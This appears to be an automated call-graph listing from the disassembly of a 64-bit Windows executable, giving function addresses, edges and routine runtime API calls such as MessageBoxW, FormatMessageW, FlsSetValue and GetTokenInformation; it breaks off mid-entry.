7ff6e3a707b5 16522->16229 16524 7ff6e3a6be09 16523->16524 16525 7ff6e3a63b73 16524->16525 16526 7ff6e3a6be60 IsProcessorFeaturePresent 16524->16526 16525->16277 16527 7ff6e3a6be78 16526->16527 18730 7ff6e3a6c054 RtlCaptureContext 16527->18730 16533 7ff6e3a66aca 16532->16533 16534 7ff6e3a66ab3 16532->16534 16533->16233 16534->16533 18735 7ff6e3a61590 16534->18735 16536 7ff6e3a66ad4 16536->16533 16537 7ff6e3a64040 49 API calls 16536->16537 16538 7ff6e3a66b35 16537->16538 16539 7ff6e3a62b10 59 API calls 16538->16539 16540 7ff6e3a66ba5 __std_exception_copy memcpy_s 16538->16540 16539->16533 16540->16233 16555 7ff6e3a6660a memcpy_s 16541->16555 16542 7ff6e3a6672f 16545 7ff6e3a64040 49 API calls 16542->16545 16544 7ff6e3a6674b 16547 7ff6e3a62b10 59 API calls 16544->16547 16546 7ff6e3a667a8 16545->16546 16550 7ff6e3a64040 49 API calls 16546->16550 16551 7ff6e3a66741 __std_exception_copy 16547->16551 16548 7ff6e3a64040 49 API calls 16548->16555 16549 7ff6e3a66710 16549->16542 16552 7ff6e3a64040 49 API calls 16549->16552 16553 7ff6e3a667d8 16550->16553 16554 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16551->16554 16552->16542 16558 7ff6e3a64040 49 API calls 16553->16558 16556 7ff6e3a63c06 16554->16556 16555->16542 16555->16544 16555->16548 16555->16549 16555->16555 16557 7ff6e3a61700 135 API calls 16555->16557 16559 7ff6e3a66731 16555->16559 18759 7ff6e3a61940 16555->18759 16556->16244 16561 7ff6e3a66570 16556->16561 16557->16555 16558->16551 16560 7ff6e3a62b10 59 API calls 16559->16560 16560->16551 18763 7ff6e3a68260 16561->18763 16563 7ff6e3a6658c 16564 7ff6e3a68260 58 API calls 16563->16564 16565 7ff6e3a6659f 16564->16565 16566 7ff6e3a665d5 16565->16566 16567 7ff6e3a665b7 16565->16567 16568 7ff6e3a62b10 59 API calls 16566->16568 18767 7ff6e3a66ef0 GetProcAddress 16567->18767 16570 7ff6e3a63c14 16568->16570 16570->16244 16570->16252 16572 7ff6e3a66c54 16571->16572 16573 7ff6e3a66cca 16572->16573 16574 7ff6e3a62b10 59 API calls 16572->16574 16573->16258 16575 7ff6e3a66cae 16574->16575 16576 7ff6e3a66840 FreeLibrary 16575->16576 16576->16573 16578 7ff6e3a61f05 16577->16578 16579 7ff6e3a750a4 49 API calls 16578->16579 16580 7ff6e3a61f28 16579->16580 16580->16249 18826 7ff6e3a65bc0 16581->18826 16584 7ff6e3a6348d 16584->16257 16586 7ff6e3a63464 16586->16584 18895 7ff6e3a65920 16586->18895 16588 7ff6e3a63470 16588->16584 18904 7ff6e3a65a90 16588->18904 16634 7ff6e3a6bda0 16615->16634 16617 7ff6e3a629dc GetLastError 16618 7ff6e3a62a09 16617->16618 16636 7ff6e3a750a4 16618->16636 16623 7ff6e3a61ee0 49 API calls 16624 7ff6e3a62a66 __scrt_get_show_window_mode 16623->16624 16625 7ff6e3a68bd0 54 API calls 16624->16625 16626 7ff6e3a62a9b 16625->16626 16627 7ff6e3a62ad8 MessageBoxA 16626->16627 16628 7ff6e3a62aa0 16626->16628 16630 7ff6e3a62af2 16627->16630 16629 7ff6e3a68bd0 54 API calls 16628->16629 16632 7ff6e3a62aba MessageBoxW 16629->16632 16631 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16630->16631 16633 7ff6e3a62b02 16631->16633 16632->16630 16633->16325 16635 7ff6e3a6bdca 16634->16635 16635->16617 16635->16635 16638 7ff6e3a750fe 16636->16638 16637 7ff6e3a75123 16666 7ff6e3a7b3b8 16637->16666 16638->16637 16639 7ff6e3a7515f 16638->16639 16674 7ff6e3a73330 16639->16674 16642 7ff6e3a7514d 16644 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16642->16644 16643 7ff6e3a7523c 16645 7ff6e3a7b4ec __free_lconv_num 11 API calls 16643->16645 16647 7ff6e3a62a37 16644->16647 16645->16642 16654 7ff6e3a68560 16647->16654 16648 7ff6e3a75260 16648->16643 16651 7ff6e3a7526a 16648->16651 16649 7ff6e3a75211 16652 7ff6e3a7b4ec __free_lconv_num 11 API calls 16649->16652 16650 7ff6e3a75208 16650->16643 16650->16649 16653 7ff6e3a7b4ec __free_lconv_num 11 API calls 16651->16653 16652->16642 16653->16642 16655 7ff6e3a6856c 16654->16655 16656 7ff6e3a6858d FormatMessageW 16655->16656 16657 7ff6e3a68587 GetLastError 16655->16657 16658 7ff6e3a685dc WideCharToMultiByte 16656->16658 16659 7ff6e3a685c0 16656->16659 16657->16656 16660 7ff6e3a68616 16658->16660 16661 7ff6e3a685d3 16658->16661 16662 7ff6e3a629c0 54 API calls 16659->16662 16663 7ff6e3a629c0 54 API calls 16660->16663 16664 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16661->16664 16662->16661 16663->16661 16665 7ff6e3a62a3e 16664->16665 16665->16623 16688 7ff6e3a7b100 16666->16688 16669 7ff6e3a7b3f3 16669->16642 16675 7ff6e3a7336e 16674->16675 16676 7ff6e3a7335e 16674->16676 16677 7ff6e3a73377 16675->16677 16684 7ff6e3a733a5 16675->16684 16680 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16676->16680 16678 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16677->16678 16679 7ff6e3a7339d 16678->16679 16679->16643 16679->16648 16679->16649 16679->16650 16680->16679 16683 7ff6e3a73654 16686 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16683->16686 16684->16676 16684->16679 16684->16683 16726 7ff6e3a73cc0 16684->16726 16752 7ff6e3a73988 16684->16752 16782 7ff6e3a73210 16684->16782 16785 7ff6e3a74ee0 16684->16785 16686->16676 16689 7ff6e3a7b11c GetLastError 16688->16689 16690 7ff6e3a7b157 16688->16690 16691 7ff6e3a7b12c 16689->16691 16690->16669 16694 7ff6e3a7b16c 16690->16694 16701 7ff6e3a7bf30 16691->16701 16695 7ff6e3a7b188 GetLastError SetLastError 16694->16695 16696 7ff6e3a7b1a0 16694->16696 16695->16696 16696->16669 16697 7ff6e3a7b4a4 IsProcessorFeaturePresent 16696->16697 16698 7ff6e3a7b4b7 16697->16698 16718 7ff6e3a7b1b8 16698->16718 16702 7ff6e3a7bf6a FlsSetValue 16701->16702 16703 7ff6e3a7bf4f FlsGetValue 16701->16703 16705 7ff6e3a7bf77 16702->16705 16716 7ff6e3a7b147 SetLastError 16702->16716 16704 7ff6e3a7bf64 16703->16704 16703->16716 16704->16702 16706 7ff6e3a7f738 _get_daylight 11 API calls 16705->16706 16707 7ff6e3a7bf86 16706->16707 16708 7ff6e3a7bfa4 FlsSetValue 16707->16708 16709 7ff6e3a7bf94 FlsSetValue 16707->16709 16711 7ff6e3a7bfc2 16708->16711 16712 7ff6e3a7bfb0 FlsSetValue 16708->16712 16710 7ff6e3a7bf9d 16709->16710 16713 7ff6e3a7b4ec __free_lconv_num 11 API calls 16710->16713 16714 7ff6e3a7ba98 _get_daylight 11 API calls 16711->16714 16712->16710 16713->16716 16715 7ff6e3a7bfca 16714->16715 16717 7ff6e3a7b4ec __free_lconv_num 11 API calls 16715->16717 16716->16690 16717->16716 16719 7ff6e3a7b1f2 _wfindfirst32i64 __scrt_get_show_window_mode 16718->16719 16720 7ff6e3a7b21a RtlCaptureContext RtlLookupFunctionEntry 16719->16720 16721 7ff6e3a7b28a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16720->16721 16722 7ff6e3a7b254 RtlVirtualUnwind 16720->16722 16723 7ff6e3a7b2dc _wfindfirst32i64 16721->16723 16722->16721 16724 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16723->16724 16725 7ff6e3a7b2fb GetCurrentProcess TerminateProcess 16724->16725 16727 7ff6e3a73d75 16726->16727 16728 7ff6e3a73d02 16726->16728 16731 7ff6e3a73d7a 16727->16731 16732 7ff6e3a73dcf 16727->16732 16729 7ff6e3a73d08 16728->16729 16730 7ff6e3a73d9f 16728->16730 16735 7ff6e3a73d0d 16729->16735 16736 7ff6e3a73dde 16729->16736 16809 7ff6e3a72270 16730->16809 16733 7ff6e3a73daf 16731->16733 16739 7ff6e3a73d7c 16731->16739 16732->16730 16732->16736 16750 7ff6e3a73d38 16732->16750 16816 7ff6e3a71e60 16733->16816 16741 7ff6e3a73d1d 16735->16741 16742 7ff6e3a73d50 16735->16742 16735->16750 16751 7ff6e3a73e0d 16736->16751 16823 7ff6e3a72680 16736->16823 16739->16741 16743 7ff6e3a73d8b 16739->16743 16741->16751 16791 7ff6e3a74624 16741->16791 16742->16751 16801 7ff6e3a74ae0 16742->16801 16743->16730 16744 7ff6e3a73d90 16743->16744 16744->16751 16805 7ff6e3a74c78 16744->16805 16746 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16748 7ff6e3a740a3 16746->16748 16748->16684 16750->16751 16830 7ff6e3a7f3f8 16750->16830 16751->16746 16753 7ff6e3a739a9 16752->16753 16754 7ff6e3a73993 16752->16754 16755 7ff6e3a739e7 16753->16755 16756 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16753->16756 16754->16755 16757 7ff6e3a73d75 16754->16757 16758 7ff6e3a73d02 16754->16758 16755->16684 16756->16755 16761 7ff6e3a73d7a 16757->16761 16762 7ff6e3a73dcf 16757->16762 16759 7ff6e3a73d08 16758->16759 16760 7ff6e3a73d9f 16758->16760 16765 7ff6e3a73dde 16759->16765 16769 7ff6e3a73d0d 16759->16769 16766 7ff6e3a72270 38 API calls 16760->16766 16763 7ff6e3a73d7c 16761->16763 16764 7ff6e3a73daf 16761->16764 16762->16760 16762->16765 16780 7ff6e3a73d38 16762->16780 16771 7ff6e3a73d8b 16763->16771 16772 7ff6e3a73d1d 16763->16772 16767 7ff6e3a71e60 38 API calls 16764->16767 16770 7ff6e3a72680 38 API calls 16765->16770 16781 7ff6e3a73e0d 16765->16781 16766->16780 16767->16780 16768 7ff6e3a74624 47 API calls 16768->16780 16769->16772 16773 7ff6e3a73d50 16769->16773 16769->16780 16770->16780 16771->16760 16774 7ff6e3a73d90 16771->16774 16772->16768 16772->16781 16775 7ff6e3a74ae0 47 API calls 16773->16775 16773->16781 16777 7ff6e3a74c78 37 API calls 16774->16777 16774->16781 16775->16780 16776 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16778 7ff6e3a740a3 16776->16778 16777->16780 16778->16684 16779 7ff6e3a7f3f8 47 API calls 16779->16780 16780->16779 16780->16781 16781->16776 16981 7ff6e3a71434 16782->16981 16786 7ff6e3a74ef7 16785->16786 16998 7ff6e3a7e558 16786->16998 16792 7ff6e3a74646 16791->16792 16840 7ff6e3a712a0 16792->16840 16797 7ff6e3a74ee0 45 API calls 16800 7ff6e3a74783 16797->16800 16798 7ff6e3a74ee0 45 API calls 16799 7ff6e3a7480c 16798->16799 16799->16750 16800->16798 16800->16799 16800->16800 16802 7ff6e3a74af8 16801->16802 16804 7ff6e3a74b60 16801->16804 16803 7ff6e3a7f3f8 47 API calls 16802->16803 16802->16804 16803->16804 16804->16750 16806 7ff6e3a74c99 16805->16806 16807 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16806->16807 16808 7ff6e3a74cca 16806->16808 16807->16808 16808->16750 16810 7ff6e3a722a3 16809->16810 16811 7ff6e3a722d2 16810->16811 16813 7ff6e3a7238f 16810->16813 16812 7ff6e3a712a0 12 API calls 16811->16812 16815 7ff6e3a7230f 16811->16815 16812->16815 16814 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16813->16814 16814->16815 16815->16750 16817 7ff6e3a71e93 16816->16817 16818 7ff6e3a71ec2 16817->16818 16820 7ff6e3a71f7f 16817->16820 16819 7ff6e3a712a0 12 API calls 16818->16819 16822 7ff6e3a71eff 16818->16822 16819->16822 16821 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16820->16821 16821->16822 16822->16750 16824 7ff6e3a726b3 16823->16824 16825 7ff6e3a726e2 16824->16825 16827 7ff6e3a7279f 16824->16827 16826 7ff6e3a712a0 12 API calls 16825->16826 16829 7ff6e3a7271f 16825->16829 16826->16829 16828 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16827->16828 16828->16829 16829->16750 16831 7ff6e3a7f420 16830->16831 16832 7ff6e3a7f465 16831->16832 16833 7ff6e3a74ee0 45 API calls 16831->16833 16834 7ff6e3a7f425 __scrt_get_show_window_mode 16831->16834 16836 7ff6e3a7f44e __scrt_get_show_window_mode 16831->16836 16832->16834 16832->16836 16978 7ff6e3a80aa8 16832->16978 16833->16832 16834->16750 16835 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16835->16834 16836->16834 16836->16835 16841 7ff6e3a712d7 16840->16841 16847 7ff6e3a712c6 16840->16847 16842 7ff6e3a7e19c _fread_nolock 12 API calls 16841->16842 16841->16847 16843 7ff6e3a71304 16842->16843 16844 7ff6e3a71318 16843->16844 16845 7ff6e3a7b4ec __free_lconv_num 11 API calls 16843->16845 16846 7ff6e3a7b4ec __free_lconv_num 11 API calls 16844->16846 16845->16844 16846->16847 16848 7ff6e3a7f110 16847->16848 16849 7ff6e3a7f12d 16848->16849 16850 7ff6e3a7f160 16848->16850 16851 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16849->16851 16850->16849 16852 7ff6e3a7f192 16850->16852 16860 7ff6e3a74761 16851->16860 16857 7ff6e3a7f2a5 16852->16857 16863 7ff6e3a7f1da 16852->16863 16853 7ff6e3a7f397 16903 7ff6e3a7e5fc 16853->16903 16855 7ff6e3a7f35d 16896 7ff6e3a7e994 16855->16896 16856 7ff6e3a7f32c 16889 7ff6e3a7ec74 16856->16889 16857->16853 16857->16855 16857->16856 16859 7ff6e3a7f2ef 16857->16859 16862 7ff6e3a7f2e5 16857->16862 16879 7ff6e3a7eea4 16859->16879 16860->16797 16860->16800 16862->16855 16865 7ff6e3a7f2ea 16862->16865 16863->16860 16870 7ff6e3a7b01c 16863->16870 16865->16856 16865->16859 16868 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 16869 7ff6e3a7f3f4 16868->16869 16871 7ff6e3a7b029 16870->16871 16872 7ff6e3a7b033 16870->16872 16871->16872 16877 7ff6e3a7b04e 16871->16877 16873 7ff6e3a75aa4 _get_daylight 11 API calls 16872->16873 16874 7ff6e3a7b03a 16873->16874 16912 7ff6e3a7b484 16874->16912 16875 7ff6e3a7b046 16875->16860 16875->16868 16877->16875 16878 7ff6e3a75aa4 _get_daylight 11 API calls 16877->16878 16878->16874 16914 7ff6e3a84cfc 16879->16914 16883 7ff6e3a7ef50 16883->16860 16884 7ff6e3a7ef4c 16884->16883 16885 7ff6e3a7efa1 16884->16885 16887 7ff6e3a7ef6c 16884->16887 16967 7ff6e3a7ea90 16885->16967 16963 7ff6e3a7ed4c 16887->16963 16890 7ff6e3a84cfc 38 API calls 16889->16890 16891 7ff6e3a7ecbe 16890->16891 16892 7ff6e3a84744 37 API calls 16891->16892 16893 7ff6e3a7ed0e 16892->16893 16894 7ff6e3a7ed12 16893->16894 16895 7ff6e3a7ed4c 45 API calls 16893->16895 16894->16860 16895->16894 16897 7ff6e3a84cfc 38 API calls 16896->16897 16898 7ff6e3a7e9df 16897->16898 16899 7ff6e3a84744 37 API calls 16898->16899 16901 7ff6e3a7ea37 16899->16901 16900 7ff6e3a7ea3b 16900->16860 16901->16900 16902 7ff6e3a7ea90 45 API calls 16901->16902 16902->16900 16904 7ff6e3a7e674 16903->16904 16905 7ff6e3a7e641 16903->16905 16907 7ff6e3a7e68c 16904->16907 16909 7ff6e3a7e70d 16904->16909 16906 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16905->16906 16911 7ff6e3a7e66d __scrt_get_show_window_mode 16906->16911 16908 7ff6e3a7e994 46 API calls 16907->16908 16908->16911 16910 7ff6e3a74ee0 45 API calls 16909->16910 16909->16911 16910->16911 16911->16860 16913 7ff6e3a7b31c _invalid_parameter_noinfo 37 API calls 16912->16913 16915 7ff6e3a84d4f fegetenv 16914->16915 16916 7ff6e3a88c5c 37 API calls 16915->16916 16919 7ff6e3a84da2 16916->16919 16917 7ff6e3a84dcf 16922 7ff6e3a7b01c __std_exception_copy 37 API calls 16917->16922 16918 7ff6e3a84e92 16920 7ff6e3a88c5c 37 API calls 16918->16920 16919->16918 16923 7ff6e3a84e6c 16919->16923 16924 7ff6e3a84dbd 16919->16924 16921 7ff6e3a84ebc 16920->16921 16925 7ff6e3a88c5c 37 API calls 16921->16925 16926 7ff6e3a84e4d 16922->16926 16927 7ff6e3a7b01c __std_exception_copy 37 API calls 16923->16927 16924->16917 16924->16918 16928 7ff6e3a84ecd 16925->16928 16929 7ff6e3a85f74 16926->16929 16933 7ff6e3a84e55 16926->16933 16927->16926 16931 7ff6e3a88e50 20 API calls 16928->16931 16930 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 16929->16930 16932 7ff6e3a85f89 16930->16932 16940 7ff6e3a84f36 __scrt_get_show_window_mode 16931->16940 16934 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16933->16934 16935 7ff6e3a7eef1 16934->16935 16959 7ff6e3a84744 16935->16959 16936 7ff6e3a852df __scrt_get_show_window_mode 16937 7ff6e3a8561f 16939 7ff6e3a84860 37 API calls 16937->16939 16938 7ff6e3a84f77 memcpy_s 16952 7ff6e3a853d3 memcpy_s __scrt_get_show_window_mode 16938->16952 16957 7ff6e3a858bb memcpy_s __scrt_get_show_window_mode 16938->16957 16945 7ff6e3a85d37 16939->16945 16940->16936 16940->16938 16943 7ff6e3a75aa4 _get_daylight 11 API calls 16940->16943 16941 7ff6e3a855cb 16941->16937 16942 7ff6e3a85f8c memcpy_s 37 API calls 16941->16942 16942->16937 16944 7ff6e3a853b0 16943->16944 16946 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 16944->16946 16948 7ff6e3a85f8c memcpy_s 37 API calls 16945->16948 16956 7ff6e3a85d92 16945->16956 16946->16938 16947 7ff6e3a85f18 16950 7ff6e3a88c5c 37 API calls 16947->16950 16948->16956 16949 7ff6e3a75aa4 11 API calls _get_daylight 16949->16957 16950->16933 16951 7ff6e3a75aa4 11 API calls _get_daylight 16951->16952 16952->16941 16952->16951 16954 7ff6e3a7b484 37 API calls _invalid_parameter_noinfo 16952->16954 16953 7ff6e3a84860 37 API calls 16953->16956 16954->16952 16955 7ff6e3a85f8c memcpy_s 37 API calls 16955->16956 16956->16947 16956->16953 16956->16955 16957->16937 16957->16941 16957->16949 16958 7ff6e3a7b484 37 API calls _invalid_parameter_noinfo 16957->16958 16958->16957 16960 7ff6e3a84763 16959->16960 16961 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16960->16961 16962 7ff6e3a8478e memcpy_s 16960->16962 16961->16962 16962->16884 16964 7ff6e3a7ed78 memcpy_s 16963->16964 16965 7ff6e3a74ee0 45 API calls 16964->16965 16966 7ff6e3a7ee32 memcpy_s __scrt_get_show_window_mode 16964->16966 16965->16966 16966->16883 16968 7ff6e3a7eacb 16967->16968 16972 7ff6e3a7eb18 memcpy_s 16967->16972 16969 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16968->16969 16970 7ff6e3a7eaf7 16969->16970 16970->16883 16971 7ff6e3a7eb83 16973 7ff6e3a7b01c __std_exception_copy 37 API calls 16971->16973 16972->16971 16974 7ff6e3a74ee0 45 API calls 16972->16974 16975 7ff6e3a7ebc5 memcpy_s 16973->16975 16974->16971 16976 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 16975->16976 16977 7ff6e3a7ec70 16976->16977 16980 7ff6e3a80acc WideCharToMultiByte 16978->16980 16982 7ff6e3a71473 16981->16982 16983 7ff6e3a71461 16981->16983 16986 7ff6e3a71480 16982->16986 16989 7ff6e3a714bd 16982->16989 16984 7ff6e3a75aa4 _get_daylight 11 API calls 16983->16984 16985 7ff6e3a71466 16984->16985 16987 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 16985->16987 16988 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16986->16988 16994 7ff6e3a71471 16987->16994 16988->16994 16990 7ff6e3a71566 16989->16990 16992 7ff6e3a75aa4 _get_daylight 11 API calls 16989->16992 16991 7ff6e3a75aa4 _get_daylight 11 API calls 16990->16991 16990->16994 16993 7ff6e3a71610 16991->16993 16995 7ff6e3a7155b 16992->16995 16996 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 16993->16996 16994->16684 16997 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 16995->16997 16996->16994 16997->16990 16999 7ff6e3a74f1f 16998->16999 17000 7ff6e3a7e571 16998->17000 17002 7ff6e3a7e5c4 16999->17002 17000->16999 17006 7ff6e3a83f54 17000->17006 17003 7ff6e3a7e5dd 17002->17003 17005 7ff6e3a74f2f 17002->17005 17003->17005 17050 7ff6e3a832a0 17003->17050 17005->16684 17018 7ff6e3a7bcf0 GetLastError 17006->17018 17009 7ff6e3a83fae 17009->16999 17019 7ff6e3a7bd14 FlsGetValue 17018->17019 17020 7ff6e3a7bd31 FlsSetValue 17018->17020 17021 7ff6e3a7bd2b 17019->17021 17038 7ff6e3a7bd21 17019->17038 17022 7ff6e3a7bd43 17020->17022 17020->17038 17021->17020 17024 7ff6e3a7f738 _get_daylight 11 API calls 17022->17024 17023 7ff6e3a7bd9d SetLastError 17025 7ff6e3a7bdbd 17023->17025 17026 7ff6e3a7bdaa 17023->17026 17027 7ff6e3a7bd52 17024->17027 17041 7ff6e3a7b07c 17025->17041 17026->17009 17040 7ff6e3a81298 EnterCriticalSection 17026->17040 17029 7ff6e3a7bd70 FlsSetValue 17027->17029 17030 7ff6e3a7bd60 FlsSetValue 17027->17030 17033 7ff6e3a7bd7c FlsSetValue 17029->17033 17034 7ff6e3a7bd8e 17029->17034 17032 7ff6e3a7bd69 17030->17032 17036 7ff6e3a7b4ec __free_lconv_num 11 API calls 17032->17036 17033->17032 17035 7ff6e3a7ba98 _get_daylight 11 API calls 17034->17035 17037 7ff6e3a7bd96 17035->17037 17036->17038 17039 7ff6e3a7b4ec __free_lconv_num 11 API calls 17037->17039 17038->17023 17039->17023 17042 7ff6e3a842a0 __FrameHandler3::FrameUnwindToEmptyState EnterCriticalSection LeaveCriticalSection 17041->17042 17043 7ff6e3a7b085 17042->17043 17044 7ff6e3a7b094 17043->17044 17045 7ff6e3a842f0 __FrameHandler3::FrameUnwindToEmptyState 44 API calls 17043->17045 17046 7ff6e3a7b09d IsProcessorFeaturePresent 17044->17046 17049 7ff6e3a7b0c7 __FrameHandler3::FrameUnwindToEmptyState 17044->17049 17045->17044 17047 7ff6e3a7b0ac 17046->17047 17048 7ff6e3a7b1b8 _wfindfirst32i64 14 API calls 17047->17048 17048->17049 17051 7ff6e3a7bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17050->17051 17052 7ff6e3a832a9 17051->17052 17060 7ff6e3a7594c EnterCriticalSection 17053->17060 17062 7ff6e3a6288c 17061->17062 17063 7ff6e3a750a4 49 API calls 17062->17063 17064 7ff6e3a628dd 17063->17064 17065 7ff6e3a75aa4 _get_daylight 11 API calls 17064->17065 17066 7ff6e3a628e2 17065->17066 17080 7ff6e3a75ac4 17066->17080 17069 7ff6e3a61ee0 49 API calls 17070 7ff6e3a62911 __scrt_get_show_window_mode 17069->17070 17071 7ff6e3a68bd0 57 API calls 17070->17071 17072 7ff6e3a62946 17071->17072 17073 7ff6e3a6294b 17072->17073 17074 7ff6e3a62983 MessageBoxA 17072->17074 17075 7ff6e3a68bd0 57 API calls 17073->17075 17076 7ff6e3a6299d 17074->17076 17077 7ff6e3a62965 MessageBoxW 17075->17077 17078 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17076->17078 17077->17076 17079 7ff6e3a629ad 17078->17079 17079->16335 17081 7ff6e3a7be68 _get_daylight 11 API calls 17080->17081 17082 7ff6e3a75adb 17081->17082 17083 7ff6e3a628e9 17082->17083 17084 7ff6e3a7f738 _get_daylight 11 API calls 17082->17084 17087 7ff6e3a75b1b 17082->17087 17083->17069 17085 7ff6e3a75b10 17084->17085 17086 7ff6e3a7b4ec __free_lconv_num 11 API calls 17085->17086 17086->17087 17087->17083 17092 7ff6e3a7fe08 17087->17092 17090 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 17091 7ff6e3a75b60 17090->17091 17097 7ff6e3a7fe25 17092->17097 17093 7ff6e3a7fe2a 17094 7ff6e3a75b41 17093->17094 17095 7ff6e3a75aa4 _get_daylight 11 API calls 17093->17095 17094->17083 17094->17090 17096 7ff6e3a7fe34 17095->17096 17098 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 17096->17098 17097->17093 17097->17094 17099 7ff6e3a7fe74 17097->17099 17098->17094 17099->17094 17100 7ff6e3a75aa4 _get_daylight 11 API calls 17099->17100 17100->17096 17102 7ff6e3a68d04 WideCharToMultiByte 17101->17102 17103 7ff6e3a68d72 WideCharToMultiByte 17101->17103 17105 7ff6e3a68d2e 17102->17105 17109 7ff6e3a68d45 17102->17109 17104 7ff6e3a68d9f 17103->17104 17108 7ff6e3a63f15 17103->17108 17106 7ff6e3a629c0 57 API calls 17104->17106 17107 7ff6e3a629c0 57 API calls 17105->17107 17106->17108 17107->17108 17108->16344 17108->16346 17109->17103 17110 7ff6e3a68d5b 17109->17110 17111 7ff6e3a629c0 57 API calls 17110->17111 17111->17108 17113 7ff6e3a7af93 17112->17113 17116 7ff6e3a67bde 17112->17116 17114 7ff6e3a7b01c __std_exception_copy 37 API calls 17113->17114 17113->17116 17115 7ff6e3a7afc0 17114->17115 17115->17116 17117 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 17115->17117 17116->16362 17118 7ff6e3a7aff0 17117->17118 17120 7ff6e3a63fc0 116 API calls 17119->17120 17121 7ff6e3a61ac6 17120->17121 17122 7ff6e3a61c74 17121->17122 17124 7ff6e3a682b0 83 API calls 17121->17124 17123 7ff6e3a6be00 _wfindfirst32i64 8 API calls 17122->17123 17125 7ff6e3a61c88 17123->17125 17126 7ff6e3a61afe 17124->17126 17125->16382 17152 7ff6e3a63e30 17125->17152 17150 7ff6e3a61b2f 17126->17150 17158 7ff6e3a70df4 17126->17158 17128 7ff6e3a7076c 74 API calls 17128->17122 17129 7ff6e3a61b18 17130 7ff6e3a61b1c 17129->17130 17131 7ff6e3a61b34 17129->17131 17132 7ff6e3a62870 59 API calls 17130->17132 17162 7ff6e3a70abc 17131->17162 17132->17150 17135 7ff6e3a61b67 17138 7ff6e3a70df4 73 API calls 17135->17138 17136 7ff6e3a61b4f 17137 7ff6e3a62870 59 API calls 17136->17137 17137->17150 17139 7ff6e3a61bb4 17138->17139 17140 7ff6e3a61bc6 17139->17140 17141 7ff6e3a61bde 17139->17141 17142 7ff6e3a62870 59 API calls 17140->17142 17143 7ff6e3a70abc _fread_nolock 53 API calls 17141->17143 17142->17150 17144 7ff6e3a61bf3 17143->17144 17145 7ff6e3a61bf9 17144->17145 17146 7ff6e3a61c0e 17144->17146 17147 7ff6e3a62870 59 API calls 17145->17147 17165 7ff6e3a70830 17146->17165 17147->17150 17150->17128 17151 7ff6e3a62b10 59 API calls 17151->17150 17153 7ff6e3a61ee0 49 API calls 17152->17153 17154 7ff6e3a63e4d 17153->17154 17154->16381 17156 7ff6e3a61ee0 49 API calls 17155->17156 17157 7ff6e3a64070 17156->17157 17157->16382 17157->17157 17159 7ff6e3a70e24 17158->17159 17171 7ff6e3a70b84 17159->17171 17161 7ff6e3a70e3d 17161->17129 17183 7ff6e3a70adc 17162->17183 17166 7ff6e3a70839 17165->17166 17170 7ff6e3a61c22 17165->17170 17167 7ff6e3a75aa4 _get_daylight 11 API calls 17166->17167 17168 7ff6e3a7083e 17167->17168 17169 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 17168->17169 17169->17170 17170->17150 17170->17151 17172 7ff6e3a70bee 17171->17172 17173 7ff6e3a70bae 17171->17173 17172->17173 17175 7ff6e3a70bfa 17172->17175 17174 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 17173->17174 17176 7ff6e3a70bd5 17174->17176 17182 7ff6e3a7594c EnterCriticalSection 17175->17182 17176->17161 17184 7ff6e3a70b06 17183->17184 17195 7ff6e3a61b49 17183->17195 17185 7ff6e3a70b15 __scrt_get_show_window_mode 17184->17185 17186 7ff6e3a70b52 17184->17186 17184->17195 17189 7ff6e3a75aa4 _get_daylight 11 API calls 17185->17189 17196 7ff6e3a7594c EnterCriticalSection 17186->17196 17191 7ff6e3a70b2a 17189->17191 17193 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 17191->17193 17193->17195 17195->17135 17195->17136 17198 7ff6e3a68711 __std_exception_copy 17197->17198 17199 7ff6e3a6868f GetTokenInformation 17197->17199 17202 7ff6e3a6872a 17198->17202 17203 7ff6e3a68724 CloseHandle 17198->17203 17200 7ff6e3a686bb 17199->17200 17201 7ff6e3a686b0 GetLastError 17199->17201 17200->17198 17204 7ff6e3a686d7 GetTokenInformation 17200->17204 17201->17198 17201->17200 17202->16391 17203->17202 17204->17198 17205 7ff6e3a686fa 17204->17205 17205->17198 17206 7ff6e3a68704 ConvertSidToStringSidW 17205->17206 17206->17198 17208 7ff6e3a68765 17207->17208 17224 7ff6e3a752f8 17208->17224 17212 7ff6e3a62c50 17211->17212 17213 7ff6e3a750a4 49 API calls 17212->17213 17214 7ff6e3a62c9b __scrt_get_show_window_mode 17213->17214 17215 7ff6e3a68bd0 57 API calls 17214->17215 17216 7ff6e3a62cd0 17215->17216 17217 7ff6e3a62d0d MessageBoxA 17216->17217 17218 